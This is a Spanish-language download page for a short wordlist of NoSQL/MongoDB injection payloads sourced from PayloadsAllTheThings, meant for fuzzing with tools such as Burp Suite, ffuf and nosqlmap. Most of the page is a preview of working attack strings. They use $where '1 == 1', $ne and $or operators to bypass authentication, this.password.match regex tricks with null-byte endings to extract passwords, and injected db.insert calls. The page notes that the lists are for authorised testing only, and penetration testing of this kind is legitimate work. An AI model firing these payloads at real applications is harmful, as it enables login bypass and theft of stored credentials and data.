NoSQL injection payloads
Payloads de inyección MongoDB/NoSQL que usan los operadores $where, $ne y $or para eludir la autenticación y extraer datos.
- Tamaño
- 696 B
- Categoría
- Fuzzing
- Fuente
- swisskyrepo/PayloadsAllTheThings
- Licencia
- MIT
- Herramientas recomendadas
- burpsuiteffufnosqlmap
Vista previa
Las primeras 15 entradas. Descarga o copia la lista completa (696 B) con los botones de arriba.
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00Payloads de inyección MongoDB/NoSQL que usan los operadores $where, $ne y $or para eludir la autenticación y extraer datos.
Esta lista está orientada al fuzzing de entradas y descubrimiento de vulnerabilidades. Contiene aproximadamente 696 B y combina bien con herramientas como burpsuite, ffuf, nosqlmap. Elige la lista más pequeña que se ajuste a tu trabajo: las listas más cortas son más rápidas y discretas para ataques en línea, mientras que las más grandes ofrecen mayor cobertura para el trabajo sin conexión donde la velocidad es una restricción menor.
Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a
tu portapapeles o descargar el archivo .txt sin procesar. La lista completa se sirve directamente
desde su fuente original en GitHub.
Obtenida de swisskyrepo/PayloadsAllTheThings y distribuida bajo MIT. Utiliza las wordlists únicamente contra sistemas para los que tengas autorización explícita para realizar pruebas.